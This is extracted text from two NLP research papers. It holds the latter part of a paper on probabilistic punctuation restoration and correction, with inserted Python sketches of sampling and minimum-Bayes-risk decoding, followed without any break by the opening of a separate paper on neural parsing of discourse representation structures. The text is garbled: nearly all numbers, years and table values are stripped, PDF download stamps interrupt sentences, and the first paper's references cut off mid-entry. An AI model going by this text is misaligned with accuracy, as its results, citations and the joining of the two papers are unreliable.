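once the depunctuated sentence has been parsed, the model defines a distribution over punctuated trees and surface punctuations for that fixed tree, and the decoder described next consumes samples from it. the sketch below is an assumed toy version of that sampling step: sample_punctemes and noisy_channel_sample are invented stand-ins for the trained attach and noisychannel components, and the per-slot concatenation ignores the paper's ordering rule for punctemes that share a slot.

import random

# assumed toy version of restoration-time sampling: given the parse of a
# depunctuated sentence, draw candidate surface punctuations.
def sample_punctemes(deprel):
    return random.choice([("", ""), (",", ","), ("", ".")])   # toy distribution

def noisy_channel_sample(u):
    return u.replace(",,", ",").replace(",.", ".")            # toy rewriting

def sample_surface(constituents, n_slots):
    # constituents: list of (deprel, left_slot, right_slot); returns one sampled
    # list with a surface punctuation string per slot
    underlying = [""] * n_slots
    for deprel, left, right in constituents:
        l, r = sample_punctemes(deprel)
        underlying[left] += l
        underlying[right] += r
    return [noisy_channel_sample(u) for u in underlying]

# "if true the caper failed" has 5 words, hence 6 slots; two constituents shown
constituents = [("advcl", 0, 2), ("root", 0, 5)]
samples = [sample_surface(constituents, 6) for _ in range(1000)]  # samples for mbr
print(samples[0])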
to obtain a single prediction for x, we adopt the minimum bayes risk (mbr) approach of choosing surface punctuation x̂ that minimizes the expected loss with respect to the unknown truth x⇤. our loss function is the total edit distance over all slots (where edits operate on punctuation tokens). finding x̂ exactly would be intractable, so we use a sampling-based approx- imation and draw m = samples from the posterior distribution over (t , x). we then define x̂ = argmin x s(t) x x⇤ s(t) p̂(x⇤|t) · loss(x, x⇤) ( ) where s(t) is the set of unique x values in the sample and p̂ is the empirical distribution given by the sample. this can be evaluated in o(m ) time. to depunctuate a treebank sentence, we remove all to- kens with pos-tag punct or dependency relation punct. these are almost always leaves; else we omit the sentence. ideally, rather than maximize, one would integrate over possible trees t , in practice by sampling many values tk from psyn(· | ū) and replacing s(t) in ( ) with s k s(tk). specifically, the yara parser (rasooli and tetreault, ), a fast non-probabilistic transition-based parser that uses rich non-local features (zhang and nivre, ). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . we evaluate on arabic, english, chinese, hindi, and spanish. for each language, we train both the parser and the punctuation model on the training split of that ud treebank (§ ), and evaluate on held-out data. we compare to the bilstm-crf baseline in § (xu et al., ). we also compare to a “trivial” deterministic base- line, which merely places a period at the end of the sentence (or a "|" in the case of hindi) and adds no other punctuation. because most slots do not in fact have punctuation, the trivial baseline already does very well; to improve on it, we must fix its errors without introducing new ones. our final comparison on test data is shown in the table in figure . on all languages, our method beats (usually significantly) its com- petitors: the trivial deterministic baseline, the bilstm-crf, and the ablated version of our model (attach) that omits the noisy channel. of course, the success of our method depends on the quality of the parse trees t (which is par- ticularly low for chinese and arabic). the graph in figure explores this relationship, by evaluat- ing (on dev data) with noisier trees obtained from parsers that were variously trained on only the first %, %, . . . of the training data. on all lan- guages, provided that the trees are at least % correct, our punctuation model beats both the triv- ial baseline and the bilstm-crf (which do not use trees). it also beats the attach ablation base- line at all levels of tree accuracy (these curves are omitted from the graph to avoid clutter). in all lan- guages, better parses give better performance, and gold trees yield the best results. . punctuation correction our next goal is to correct punctuation errors in a learner corpus. each sentence is drawn from the cambridge learner corpus treebanks, which provide original (en_esl) and corrected (en_cesl) sentences. all kinds of errors are corrected, such we copied their architecture exactly but re-tuned the hy- perparameters on our data. we also tried tripling the amount of training data by adding unannotated sentences (provided along with the original annotated sentences by ginter et al. 
( )), taking advantage of the fact that the bilstm-crf does not require its training sentences to be annotated with trees. however, this actually hurt performance slightly, per- haps because the additional sentences were out-of-domain. we also tried the bigru-with-attention architecture of tilk and alumäe ( ), but it was also weaker than the bilstm- crf (just as in table ). we omit all these results from fig- ure to reduce clutter. p attach a-- --a arabic . . . . . chinese . . . . . english . . . . . hindi . . . . . spanish . . . . . figure : edit distance per slot (which we call average edit distance, or aed) for each of the corpora. lower is better. the table gives the final aed on the test data. its first columns show the baseline methods just as in table : the trivial deterministic method, the bilstm- crf, and the attach ablation baseline that attaches the surface punctuation directly to the tree. column is our method that incorporates a noisy channel, and column (in gray) is our method using oracle (gold) trees. we boldface the best non-oracle result as well as all that are not significantly worse (paired permutation test, p < . ). the curves show how our method’s aed (on dev data) varies with the labeled attachment score (las) of the trees, where --a at x = uses the oracle (gold) trees, a-- at x < uses trees from our parser trained on % of the training data, and the #-- points at x ⌧ use increasingly worse parsers. the p and at the right of the graph show the aed of the trivial deterministic baseline and the bilstm-crf baseline, which do not use trees. as syntax errors, but we use only the % of sen- tences whose depunctuated trees t are isomorphic between en_esl and en_cesl. these en_cesl trees may correct word and/or punctuation errors in en_esl, as we wish to do automatically. we assume that an english learner can make mistakes in both the attachment and the noisy channel steps. a common attachment mistake is the failure to surround a non-restrictive relative clause with commas. in the noisy channel step, mistakes in quote transposition are common. correction model. based on the assumption about the two error sources, we develop a dis- criminative model for this task. let x̄e de- note the full input sentence, and let xe and xc denote the input (possibly errorful) and output (corrected) punctuation sequences. we model p(xc | x̄e) = p t p t c psyn(t | x̄e) · p✓(t c | t, xe) · p�(xc | t c). here t is the depunctu- ated parse tree, t c is the corrected underlying tree, t e is the error underlying tree, and we assume p✓(t c | t, xe) = p t e p(t e | t, xe) · p✓(t c | t e). downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april in practice we use a -best pipeline rather than summing. our first step is to reconstruct t from the error sentence x̄e. we choose t that max- imizes psyn(t | x̄e) from a dependency parser trained on en_esl treebank examples (x̄e, t ). the second step is to reconstruct t e based on our punc- tuation model trained on en_esl. we choose t e that maximizes p(t e | t, xe). we then reconstruct t c by p(t c | t e) = q we t e p(l, r | we) ( ) where we is the node in t e, and p(l, r | we) is a similar log-linear model to equation ( ) with addi- tional features (appendix c ) which look at we. finally, we reconstruct xc based on the noisy channel p�(xc | t c) in § . . during training, � is regularized to be close to the noisy channel param- eters in the punctuation model trained on en_cesl. 
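both the restoration and the correction experiments decode with the sampling-based mbr rule: among the unique sampled punctuations, return the one with the smallest expected total slot edit distance under the empirical distribution, at quadratic cost in the number of samples. the sketch below is an assumed implementation over already-drawn samples; edit_distance, loss, and mbr are illustrative names, not the paper's code.

from collections import Counter

# assumed sketch of the sampling-based mbr decoder.
def edit_distance(a, b):
    # levenshtein distance between two token sequences (edits act on punctuation tokens)
    m, n = len(a), len(b)
    d = [[i + j if i * j == 0 else 0 for j in range(n + 1)] for i in range(m + 1)]
    for i in range(1, m + 1):
        for j in range(1, n + 1):
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1,
                          d[i - 1][j - 1] + (a[i - 1] != b[j - 1]))
    return d[m][n]

def loss(x, y):
    # total edit distance over all slots; x and y hold one token tuple per slot
    return sum(edit_distance(xi, yi) for xi, yi in zip(x, y))

def mbr(samples):
    # among the unique sampled punctuations, return the minimizer of expected
    # loss under the empirical distribution of the samples
    counts = Counter(tuple(map(tuple, x)) for x in samples)
    total = sum(counts.values())
    return min(counts, key=lambda x: sum(c / total * loss(x, y)
                                         for y, c in counts.items()))

samples = [[(",",), (".",)], [(",",), (".",)], [(), (".",)]]   # toy sample set
print(mbr(samples))   # -> ((',',), ('.',))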
we use the same mbr decoder as in § . to choose the best action. we evaluate using aed as in § . . as a second metric, we use the script from the conll shared task on grammati- cal error correction (ng et al., ): it computes the f . -measure of the set of edits found by the system, relative to the true set of edits. as shown in table , our method achieves bet- ter performance than the punctuation restoration baselines (which ignore input punctuation). on the other hand, it is soundly beaten by a new bilstm-crf that we trained specifically for the task of punctuation correction. this is the same as the bilstm-crf in the previous section, ex- cept that the bilstm now reads a punctuated input sentence (with possibly erroneous punctua- tion). to be precise, at step  i  n, the bil- stm reads a concatenation of the embedding of word i (or bos if i = ) with an embedding of the punctuation token sequence xi. the bilstm- crf wins because it is a discriminative model tai- lored for this task: the bilstm can extract arbi- trary contextual features of slot i that are corre- lated with whether xi is correct in context. . sentential rephrasing we suspect that syntactic transformations on a sentence should often preserve the underlying punctuation attached to its tree. the surface punc- tuation can then be regenerated from the trans- formed tree. such transformations include ed- its that are suggested by a writing assistance tool (heidorn, ), or subtree deletions in compres- sive summarization (knight and marcu, ). p a-- parsed gold -corr aed . . . . . . f . . . . . . . table : aed and f . results on the test split of english-esl data. lower aed is better; higher f . is better. the first three columns (markers corre- spond to figure ) are the punctuation restoration base- lines, which ignore the input punctuation. the fourth and fifth columns are our correction models, which use parsed and gold trees. the final column is the bilstm-crf model tailored for the punctuation cor- rection task. for our experiment, we evaluate an interesting case of syntactic transformation. wang and eis- ner ( ) consider a systematic rephrasing pro- cedure by rearranging the order of dependent sub- trees within a ud treebank, in order to synthesize new languages with different word order that can then be used to help train multi-lingual systems (i.e., data augmentation with synthetic data). as wang and eisner acknowledge ( , foot- note ), their permutations treat surface punctua- tion tokens like ordinary words, which can result in synthetic sentences whose punctuation is quite unlike that of real languages. in our experiment, we use wang and eisner’s ( ) “self-permutation” setting, where the de- pendents of each noun and verb are stochastically reordered, but according to a dependent ordering model that has been trained on the same language. for example, rephrasing a english sentence sconj adj punct det noun verb punct if true , the caper failed . mark det punct advcl nsubj punct root under an english ordering model may yield det noun verb punct sconj adj punct the caper failed . if true , markdet root nsubj punct advcl punct which is still grammatical except that , and . are wrongly swapped (after all, they have the same pos tag and relation type). worse, permutation may yield bizarre punctuation such as , , at the start of a sentence. our punctuation model gives a straightforward remedy—instead of permuting the tree directly, we first discover its most likely underlying tree ˆ,if true, the caper failed. det nsubj root. 
mark ,advcl, by the maximizing variant of algorithm (§ . ). then, we permute the underlying tree and sample the surface punctuation from the distribution modeled by the trained pfst, yielding downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://arxiv.org/abs/ . punctuation all base half full base half full arabic . . . . . . chinese . . . . . . english . . . . . . hindi . . . . . . spanish . . . . . . table : perplexity (evaluated on the train split to avoid evaluating generalization) of a trigram language model trained (with add- . smoothing) on differ- ent versions of rephrased training sentences. “punc- tuation” only evaluates perplexity on the trigrams that have punctuation. “all” evaluates on all the tri- grams. “base” permutes all surface dependents includ- ing punctuation (wang and eisner, ). “full” is our full approach: recover underlying punctuation, per- mute remaining dependents, regenerate surface punc- tuation. “half” is like “full” but it permutes the non- punctuation tokens identically to “base.” the permu- tation model is trained on surface trees or recovered underlying trees t , respectively. in each -way com- parison, we boldface the best result (always significant under a paired permutation test over per-sentence log- probabilities, p < . ). ˆthe caper failed ,if true,. ˆthe caper failed ,if true . det nsubj root. mark ,advcl, we leave the handling of capitalization to future work. we test the naturalness of the permuted sen- tences by asking how well a word trigram lan- guage model trained on them could predict the original sentences. as shown in table , our per- mutation approach reduces the perplexity over the baseline on of the languages, often dramati- cally. related work punctuation can aid syntactic analysis, since it signals phrase boundaries and sentence structure. briscoe ( ) and white and rajkumar ( ) parse punctuated sentences using hand-crafted constraint-based grammars that implement nun- berg’s approach in a declarative way. these gram- mars treat surface punctuation symbols as ordi- nary words, but annotate the nonterminal cate- gories so as to effectively keep track of the under- lying punctuation. this is tantamount to crafting a grammar for underlyingly punctuated sentences and composing it with a finite-state noisy channel. so the two approaches to permutation yield different training data, but are compared fairly on the same test data. the parser of ma et al. ( ) takes a differ- ent approach and treats punctuation marks as fea- tures of their neighboring words. zhang et al. ( ) use a generative model for punctuated sen- tences, leting them restore punctuation marks dur- ing transition-based parsing of unpunctuated sen- tences. li et al. ( ) use punctuation marks to segment a sentence: this "divide and rule" strat- egy reduces ambiguity in parsing of long chinese sentences. punctuation can similarly be used to constrain syntactic structure during grammar in- duction (spitkovsky et al., ). punctuation restoration (§ . ) is useful for tran- scribing text from unpunctuated speech. the task is usually treated by tagging each slot with zero or more punctuation tokens, using a traditional sequence labeling method: conditional random fields (lui and wang, ; lu and ng, ), re- current neural networks (tilk and alumäe, ), or transition-based systems (ballesteros and wan- ner, ). conclusion and future work we have provided a new computational approach to modeling punctuation. 
in our model, syntactic constituents stochastically generate latent under- lying left and right punctemes. surface punctu- ation marks are not directly attached to the syn- tax tree, but are generated from sequences of adja- cent punctemes by a (stochastic) finite-state string rewriting process . our model is inspired by nun- berg’s ( ) formal grammar for english punctu- ation, but is probabilistic and trainable. we give exact algorithms for training and inference. we trained nunberg-like models for lan- guages and l english. we compared the english model to nunberg’s, and showed how the trained models can be used across languages for punctua- tion restoration, correction, and adjustment. in the future, we would like to study the usefulness of the recovered underlying trees on tasks such as syntactically sensitive sentiment analysis (tai et al., ), machine translation (cowan et al., ), relation extraction (cu- lotta and sorensen, ), and coreference reso- lution (kong et al., ). we would also like to investigate how underlying punctuation could aid parsing. for discriminative parsing, features for scoring the tree could refer to the underly- ing punctuation, not just the surface punctuation. for generative parsing (§ ), we could follow the downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april scheme in equation ( ). for example, the psyn factor in equation ( ) might be a standard re- current neural network grammar (rnng) (dyer et al., ); when a subtree of t is completed by the reduce operation of psyn, the punctuation- augmented rnng ( ) would stochastically attach subtree-external left and right punctemes with p✓ and transduce the subtree-internal slots with p�. in the future, we are also interested in enriching the t representation and making it more differ- ent from t , to underlyingly account for other phe- nomena in t such as capitalization, spacing, mor- phology, and non-projectivity (via reordering). acknowledgments this material is based upon work supported by the national science foundation under grant nos. and , including a reu supple- ment to the first author. we are grateful to the state of maryland for the maryland advanced research computing center, a crucial resource. we thank xiaochen li for early discussion, argo lab mem- bers for further discussion, and the three reviewers for quality comments. references apoorv agarwal, boyi xie, ilia vovsha, owen rambow, and rebecca passonneau. . sen- timent analysis of twitter data. in proceedings of the workshop on language in social media (lsm ), pages – . miguel ballesteros and leo wanner. . a neu- ral network architecture for multilingual punc- tuation generation. in proceedings of the conference on empirical methods in natural language processing, pages – . yehoshua bar-hillel, m. perles, and e. shamir. . on formal properties of simple phrase structure grammars. zeitschrift für phonetik, sprachwissenschaft und kommunika- tionsforschung, : – . reprinted in y. bar-hillel ( ), language and information: selected essays on their theory and applica- tion, addison-wesley , pages – . jean berstel and christophe reutenauer. . rational series and their languages. springer- verlag. ann bies, mark ferguson, karen katz, robert macintyre, victoria tredinnick, grace kim, mary ann marcinkiewicz, and britta schas- berger. . bracketing guidelines for tree- bank ii style: penn treebank project. technical report ms-cis- - , university of pennsyl- vania. ted briscoe. . 
exploring neural methods for parsing discourse representation structures. rik van noord, lasha abzianidze, antonio toral and johan bos, center for language and cognition, university of groningen, {r.i.k.van.noord, l.abzianidze, a.toral.ruiz, johan.bos}@rug.nl.

abstract. neural methods have had several recent successes in semantic parsing, though they have yet to face the challenge of producing meaning representations based on formal semantics. we present a sequence-to-sequence neural semantic parser that is able to produce discourse representation structures (drss) for english sentences with high accuracy, outperforming traditional drs parsers. to facilitate the learning of the output, we represent drss as a sequence of flat clauses and introduce a method to verify that produced drss are well-formed and interpretable. we compare models using characters and words as input and see (somewhat surprisingly) that the former performs better than the latter. we show that eliminating variable names from the output using de bruijn indices increases parser performance. adding silver training data boosts performance even further.

introduction. semantic parsing is the task of mapping a natural language expression to an interpretable meaning representation. semantic parsing used to be the domain of symbolic and statistical approaches (pereira and shieber, ; zelle and mooney, ; blackburn and bos, ). recently, however, neural methods, and in particular sequence-to-sequence models, have been successfully applied to a wide range of semantic parsing tasks. these include code generation (ling et al., ), question answering (dong and lapata, ; he and golub, ) and abstract meaning representation parsing (konstas et al., ). because these models have no intrinsic knowledge of the structure (tree, graph, set) they have to produce, recent work also focused on structured decoding methods, creating neural architectures that always output a graph or a tree (alvarez-melis and jaakkola, ; buys and blunsom, ). these methods often outperform the more general sequence-to-sequence models but are tailored to specific meaning representations.

this paper will focus on parsing discourse representation structures (drss) proposed in discourse representation theory (drt), a well-studied formalism developed in formal semantics (kamp, ; van der sandt, ; asher, ; kamp and reyle, ; muskens, ; van eijck and kamp, ; kadmon, ; asher and lascarides, ), dealing with many semantic phenomena: quantifiers, negation, scope ambiguities, pronouns, presuppositions, and discourse structure (see figure ). drss are recursive structures and thus form a challenge for sequence-to-sequence models because they need to generate a well-formed structure and not something that looks like one but is not interpretable.

the problem that we try to tackle bears similarities to the recently introduced task of mapping sentences to an abstract meaning representation (amr; banarescu et al. ). but there are notable differences between drs and amr. firstly, drss contain scope, which results in a more linguistically motivated treatment of modals, quantification, and negation. secondly, drss contain a substantially higher number of variable bindings (reentrant nodes in amr terminology), which are challenging for learning (damonte et al., ).
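as a rough illustration of how pervasive such bindings are, the sketch below counts, for a small hand-made clausal form, in how many clauses each variable occurs; the toy clauses and the regular expression for variable names are our own assumptions rather than pmb conventions.

```python
from collections import Counter
import re

# a toy clausal-form DRS: every clause is a whitespace-separated string,
# with box variables (b1, b2, ...) and discourse referents (x1, s1, ...)
toy_clauses = [
    "b1 REF x1",
    "b1 male x1",
    "b2 NOT b3",
    "b3 REF s1",
    "b3 Experiencer s1 x1",
    "b3 Stimulus s1 x2",
    "b3 REF x2",
]

def variable_counts(clauses):
    """Count in how many clauses each variable token occurs."""
    counts = Counter()
    for clause in clauses:
        # toy assumption: variables look like a letter followed by a number
        for token in set(re.findall(r"\b[bestx]\d+\b", clause)):
            counts[token] += 1
    return counts

if __name__ == "__main__":
    for var, n in variable_counts(toy_clauses).most_common():
        print(var, n)  # variables occurring in more than one clause are re-entrant
```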
drs parsing was attempted in the s for small fragments of english (johnson and klein, ; wada and asher, ). wide-coverage drs parsers based on supervised machine learning emerged later (bos, b; le and zuidema, ; bos, ; liu et al., ).

figure : drs parsing in a nutshell, for the raw input "tom isn't afraid of anything", with the system output shown both as a drs in clausal form and as the same drs in box format. given a raw text, a system has to generate a drs in the clause format, a flat version of the standard box notation. the semantic representation formats are made more readable by using various letters for variables: the letters x, e, s, and t are used for discourse referents denoting individuals, events, states, and time, respectively, and b is used for variables denoting drs boxes.

the objectives of this paper are to apply neural methods to drs parsing. in particular, we are interested in answers to the following research questions (rqs): are sequence-to-sequence models able to produce formal meaning representations (drss)? what is better for input: sequences of characters or sequences of words; does tokenization help; and what kind of casing is best used? what is the best way of dealing with variables that occur in drss? does adding silver data increase the performance of the neural parser? and what parts of semantics are learned and what parts of semantics are still challenging?

we make the following contributions to semantic parsing: (a) the output of our parser consists of interpretable scoped meaning representations, guaranteed by a specially designed checking tool (§ ); the code is available at https://github.com/rikvn/neural_drs. (b) we compare different methods of representing input and output in § . (c) we show in § that using additional, non-gold standard data can improve performance. (d) we perform a thorough analysis of the produced output and compare our methods with symbolic/statistical approaches (§ ).

discourse representation structures. the structure of drs. drss are meaning representations introduced by drt (kamp and reyle, ). in general, a drs can be seen as an ordered pair 〈a, l:b〉, where a is a set of presuppositional drss, and b a drs with a label l. the presuppositional drss a can be viewed as propositions that need to be anchored in the context in order to make the main drs b true, where presuppositions comprise anaphoric phenomena, too (van der sandt, ; geurts, ; beaver, ). drss are either elementary drss or segmented drss. an elementary drs is an ordered pair of a set of discourse referents and a set of conditions. there are basic conditions and complex conditions. a basic condition is a predicate applied to constants or discourse referents, whereas a complex condition can introduce boolean operators ranging over drss (negation, conditionals, disjunction). segmented drss capture discourse structure by connecting two units of discourse by a discourse relation (asher and lascarides, ).
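to make the clause format concrete, the snippet below writes a clausal form down as a list of tuples (box label, operator or predicate, arguments), loosely following the example of figure ; the word-sense numbers and variable names are illustrative placeholders, not the gold pmb annotation.

```python
# an illustrative clausal-form DRS for "tom isn't afraid of anything";
# box labels, referents and sense numbers are placeholders for readability
clausal_form = [
    ("b1", "REF", "x1"),
    ("b1", "male", '"n.02"', "x1"),
    ("b1", "Name", "x1", '"tom"'),
    ("b2", "REF", "t1"),
    ("b2", "EQU", "t1", '"now"'),
    ("b2", "time", '"n.08"', "t1"),
    ("b0", "NOT", "b3"),
    ("b3", "REF", "s1"),
    ("b3", "Time", "s1", "t1"),
    ("b3", "afraid", '"a.01"', "s1"),
    ("b3", "Experiencer", "s1", "x1"),
    ("b3", "Stimulus", "s1", "x2"),
    ("b3", "REF", "x2"),
    ("b3", "entity", '"n.01"', "x2"),
]

# every clause is prefixed by the label of the box it lives in, which is
# what makes the format flat and easy to emit one token at a time
for clause in clausal_form:
    print(" ".join(clause))
```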
annotated corpora. despite a long tradition of formal interest in drt, it is only recently that textual corpora annotated with drss have been made available. the groningen meaning bank (gmb) is a large corpus with drs annotation for mostly short english newspaper texts (basile et al., ; bos et al., ). the drss in this corpus are produced by an existing semantic parser and then partially corrected. the drss in the gmb are therefore not gold standard. a similar corpus is the parallel meaning bank (pmb), which provides drss for english, german, dutch, and italian sentences based on a parallel corpus (abzianidze et al., ). the pmb, too, is constructed using an existing semantic parser, but a part of it is completely manually checked and corrected (i.e., gold standard). in contrast to the gmb, the pmb involves two major additions: (a) its semantics are refined by modeling tense and using semantic tagging (bjerva et al., ; abzianidze and bos, ), and (b) the non-logical symbols of the drss corresponding to concepts and semantic roles are grounded in wordnet (fellbaum, ) and verbnet (bonial et al., ), respectively. these additions make the drss of the pmb more fine-grained meaning representations. for this reason we choose the pmb (over the gmb) as our corpus for evaluating our semantic parser.

even though the sentences in the current release of the pmb are relatively short, they contain many difficult semantic phenomena that a semantic parser has to deal with: pronoun resolution, quantifiers, scope of modals and negation, multiword expressions, word senses, semantic roles, presupposition, tense, and discourse relations. as far as we know, we are the first group to use the pmb corpus for semantic parsing.

formatting drss with boxes and clauses. the usual way to represent drss is the well-known box format. to facilitate reading a drs with unresolved presuppositions, it can be depicted as a network of boxes, where a non-presuppositional (i.e., main) drs l:b is connected to the presuppositional drss a with arrows. each box comes with a unique label and has two rows. in the case of elementary drss, these rows contain discourse referents in the top row and conditions in the bottom row (figure ). a segmented drs has a row with labeled drss and a row with discourse relations (figure ). the drs in figure consists of a main box b and two presuppositional boxes, b and b . note that b has no discourse referents but introduces negation via a single condition ¬b with a nested box b . the conditions of b represent unary and binary relations over discourse referents that are introduced either by b or the presuppositional drss.

figure : a segmented drs. discourse relations are formatted with uppercase characters.

a clausal form is another way of formatting drss. it represents a drs as a set of clauses (see figures and ). this format is better suited for machine learning than the box format, as it has a simple, flat structure and facilitates partial matching of drss, which is useful for evaluation (van noord et al., ). conversion from the box notation to the clausal form and vice versa is transparent: discourse referents, conditions, and discourse relations in the clausal form are preceded by the label of the box in which they occur. notice that the variable letters in the semantic representations are automatically set and they simply serve for readability purposes.
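this transparency can be sketched in a few lines of code: each referent becomes a ref clause and each condition is simply prefixed with the label of its box. the class and field names below are our own simplification (presuppositional boxes and discourse relations are omitted), not taken from the released code.

```python
from dataclasses import dataclass, field
from typing import List, Tuple

@dataclass
class Box:
    """A (much simplified) elementary DRS: a label, discourse referents, conditions."""
    label: str
    referents: List[str] = field(default_factory=list)
    # a condition is a predicate/operator plus its arguments, e.g. ("male", "x1")
    conditions: List[Tuple[str, ...]] = field(default_factory=list)

def to_clauses(boxes: List[Box]) -> List[str]:
    """Flatten boxes into clausal form: every referent and condition is
    preceded by the label of the box in which it occurs."""
    clauses = []
    for box in boxes:
        for ref in box.referents:
            clauses.append(f"{box.label} REF {ref}")
        for cond in box.conditions:
            clauses.append(f"{box.label} " + " ".join(cond))
    return clauses

if __name__ == "__main__":
    b1 = Box("b1", referents=["x1"], conditions=[("male", "x1"), ("Name", "x1", '"tom"')])
    b2 = Box("b2", conditions=[("NOT", "b3")])
    b3 = Box("b3", referents=["s1"], conditions=[("Experiencer", "s1", "x1")])
    print("\n".join(to_clauses([b1, b2, b3])))
```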
throughout the experi- ments described in this paper, we utilize clausal form drss. method . annotated data we use the english drss from release . . of the pmb (abzianidze et al., ). the release sug- gests using the parts , , , and as the de- velopment set, resulting in , training and development instances. basic statistics are shown in table , and the number of occurrences of some of the semantic phenomena mentioned in § . are given in table . because this is a rather small training set, we tune our model using -fold cross-validation (cv) on the training set, rather than tuning on a separate development set. this means that we will use the suggested development set as a test set (and refer to it as such). when testing on this set, we train a model on all available training data. the utilized pmb release also comes with “silver” data—namely, , drss that are only partially http://pmb.let.rug.nl/data.php. http://pmb.let.rug.nl/data.php sentences tokens avg tok/sent gold train , , . gold test , . silver , , . table : number of documents, sentences, and to- kens for the english part of pmb release . . . note that the number of tokens is based on the pmb tokenization, treating multiword expressions as a single token. phenomenon train test silver negation & modals , scope ambiguity ≈ ≈ , pronoun resolution ≈ ≈ , discourse rel. & imp. , embedded clauses ≈ ≈ , table : counts of relevant semantic phenomena for pmb release . . . these phenomena are described and further discussed in § . . manually corrected. in addition, we use the drss from the silver data but without the manual cor- rections, which makes them “bronze” drss (fol- lowing pmb terminology). our experiments will initially use only the gold standard data, after which we will use the silver or bronze data to fur- ther push the score of our best systems. . clausal form checker the clausal form of a drs needs to satisfy a set of constraints in order to correspond to a semanti- cally interpretable drs, that is, translatable into a first-order logic formula without free occurrences of a variable (kamp and reyle, ). for ex- ample, all discourse referents need to be explicitly introduced with a ref clause to avoid free occur- rences of variables. we implemented a clausal form checker that validates the clausal form if and only if it rep- resents a semantically interpretable drs. distin- guishing box variables from entity variables is crucial for the validity checking, but automatically learned clausal forms are not expected to differen- tiate variable types. first, the checker separately the phenomena are automatically counted based on clausal forms. the counting algorithm does not guarantee the exact number for certain phenomena, though it returned the exact counts of all the phenomena on the test data except the pronoun resolution ( ). parses each clause in the form to induce variable types based on the fixed set of comparison and drs operators. after typing all the variables, the checker verifies whether the clauses collectively correspond to a drs with well-formed semantics. for each box variable in a discourse relation, ex- istence of the corresponding box inside the same segmented drs is checked. for each entity vari- able in a condition, an introduction of the binder (i.e., accessible) discourse variable is found. the goal of these two steps is to prevent free occur- rences of variables in drss. while binding the entity variables, necessary accessibility relations between the boxes are induced. 
in the end, the checker verifies the transitive closure of the in- duced accessibility relation on loops and checks existence of a unique main box of the drs. the checker is applied to every automatically obtained clausal form. if a clausal form fails the test, it is considered as ill-formed and will not have a single clause matched with the gold stan- dard when calculating the f-score. . evaluation a drs parser is evaluated by comparing its out- put drs to a gold standard drs using the counter tool (van noord et al., ). counter calculates an f-score over matching clauses. because variable names are meaningless, obtaining the matching clauses essentially is a search for the best variable mapping between two drss. counter tries to find this mapping by performing a hill-climbing search with a predefined number of restarts to avoid get- ting stuck in a local optimum, which is similar to the evaluation system smatch (cai and knight, ) for amr parsing. counter generalizes over wordnet synsets (i.e., a system is not penalized for predicting a word sense that is in the same synset as the gold standard word sense). to calculate whether there is a significant differ- ence between two systems, we perform approxi- mate randomization (noreen, ) with α = . , r = , , and f(model ) > f(model ) as test statistics for each individual drs pair. . neural architecture we use a recurrent sequence-to-sequence neu- ral network (henceforth seq seq) with two counter ignores ref clauses in the calculation of the f-score because they are usually redundant and therefore inflate the final score (van noord et al., ). tom is n't afraid of encoder decoder b ref x sep b ... x anything attention figure : the sequence-to-sequence model with word-representation input. sep is used as a spe- cial character to separate clauses in the output. bidirectional long short-term memory (lstm) layers and nodes, implemented in opennmt (klein et al., ). the network encodes a se- quence representation of the natural language ut- terance, while the decoder produces the sequences of the meaning representation. we apply dropout (srivastava et al., ) between both the recurrent encoding and decoding layers to prevent overfit- ting, and use general attention (luong et al., ) to selectively give more weight to certain parts of the input sentence. an overview of the gen- eral framework of the seq seq model is shown in figure . during decoding we perform beam search with length normalization, which in neural machine translation (nmt) is crucial to obtaining good re- sults (britz et al., ). we experimented with a wide range of parameter settings, of which the final settings can be found in table . we opted against trying to find the best parame- ter settings for each individual experiment (next to impossible in terms of computing time nec- essary, as a single -fold cv experiment takes hours on gpu), but selected parameter settings that showed good performance for both the initial character and word-level representations (see § for details). the parameter search was performed using -fold cv on the training set. training is stopped when there is no more improvement in perplexity on the validation set, which in our case occurred after – epochs. a powerful, well-known technique in the field of nmt is to use an ensemble of models during decoding (sutskever et al., ; sennrich et al., a). the resulting model averages over the pre- dictions of the individual models, which can bal- ance out some of the errors. 
in our experiments, we apply this method when decoding on the test set, but not for our experiments of -fold cv (this would take too much computation time). parameter value parameter value rnn-type lstm dropout . encoder-type brnn dropout type naive optimizer sgd bridge copy layers learning rate . nodes learning rate decay . min freq source max grad norm min freq target beam size vector size length normalization . table : parameters explored during training and testing with their final values. all other parameters have default values. experiments with data representations this section describes the experiments we con- duct regarding the data representations of the input (english sentences) and output (a drs) during training. . between characters and words we first try two (default) representations: character- level and word-level. most semantic parsers use word-level representations for the input, but as a result are often dependent on pre-trained word em- beddings or anonymization of the input to obtain good results. character-level models avoid this issue but might be at a higher risk of producing ill-formed output. character-based model in the character-level model, the input (an english sentence) is rep- resented as a sequence of individual characters. the output (a drs in clause format) is lin- earized, with special characters indicating spaces and clause separators. the semantic roles (e.g., agent, theme), drs operators (e.g., ref, not, pos), and deictic constants (e.g., "now", "speaker", "hearer") are not represented as character sequences, but treated as compound characters, meaning that ref is not treated as a sequence of r, e and f, but directly as ref. all proper names, wordnet senses, time/date expres- sions, and numerals are represented as character sequences. this is done to keep the vocabulary small. an exam- ple is to change all proper names to name in both the sentence and meaning representation during training. when producing output, the original names are restored by switch- ing name with a proper name found in the input sentence (konstas et al., ). word-based model in the word-level model, the input is represented as a sequence of words, using spaces as a separator (i.e., the original words are kept). the output is the same as for the character-based model, except that the char- acter sequences are represented as words. we use pre-trained glove embeddings (pennington et al., ) to initialize the encoder and decoder rep- resentations. in the drs representation, there are semantic roles and drs operators that might look like english words, but should not be interpreted as such (e.g. agent, not). these entities are re- moved from the set of pre-trained embeddings, so that the model will learn them from scratch (start- ing from a random initialization). hybrid representations: bpe we do not necessarily have to restrict ourselves to using only characters or words as input representa- tion. in nmt, byte-pair encoding (bpe; sennrich et al. b) is currently the de facto standard (bojar et al., ). this is a frequency-based method that automatically finds a representation that is between character-level and word-level. it starts out with the character-level format and then does a predefined number of merges of frequently co-occurring characters. tuning this number of merges determines whether the result- ing representation is closer to character-level or word-level. 
